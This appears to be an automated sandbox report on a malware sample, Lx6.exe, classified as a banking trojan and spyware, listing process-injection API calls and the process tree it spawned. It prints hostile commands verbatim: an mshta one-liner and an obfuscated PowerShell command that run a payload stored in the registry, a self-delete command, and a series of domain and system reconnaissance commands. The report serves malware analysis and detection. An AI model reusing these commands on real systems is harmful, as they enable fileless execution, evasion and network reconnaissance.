Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075B433 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00751402 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00768E68 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076E897 NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00754153 NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0077027B NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00754A69 memset,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075624E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076BB1B OpenProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_007523FC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00752BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_007684EA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075BDCE OpenProcess,OpenProcess,TerminateProcess,NtSuspendProcess,OpenProcess,CloseHandle,NtResumeProcess,CloseHandle,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00753F26 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075BF83 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03038E68 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303BB1B NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03022BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03024A69 memset,NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0304027B NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303E897 NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302BDCE TerminateProcess,NtSuspendProcess,CloseHandle,NtResumeProcess,CloseHandle,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E73BC NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40B934 NtWriteVirtualMemory,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E2950 NtQueryInformationToken,NtQueryInformationToken,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4088C8 NtSetContextThread,NtUnmapViewOfSection,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E5F64 NtQueryInformationProcess,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4057D8 NtCreateSection,
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F94A8 NtMapViewOfSection,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA9A10 NtReadVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F92950 NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FBB934 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB88C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB57D8 NtCreateSection,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F95F64 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9F4FC NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA94A8 NtMapViewOfSection,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F973BC RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FCD002 NtProtectVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F5F64 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F2950 NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D72D002 NtProtectVirtualMemory,NtProtectVirtualMemory,

Source: Lx6.exe, 00000000.00000003.448794487.0000000004094000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs Lx6.exe

Source: Lx6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: 9AF9.bin1.20.dr

Binary string: Boot Device: \Device\HarddiskVolume2

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.expl.evad.winEXE@132/40@6/4

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Lx6.exe	ReversingLabs: Detection: 66%
Source: Lx6.exe	Virustotal: Detection: 63%

Source: C:\Users\user\Desktop\Lx6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\Lx6.exe C:\Users\user\Desktop\Lx6.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Users\user\Desktop\Lx6.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain \|more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\more.com more
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Users\user\Desktop\Lx6.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain \|more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
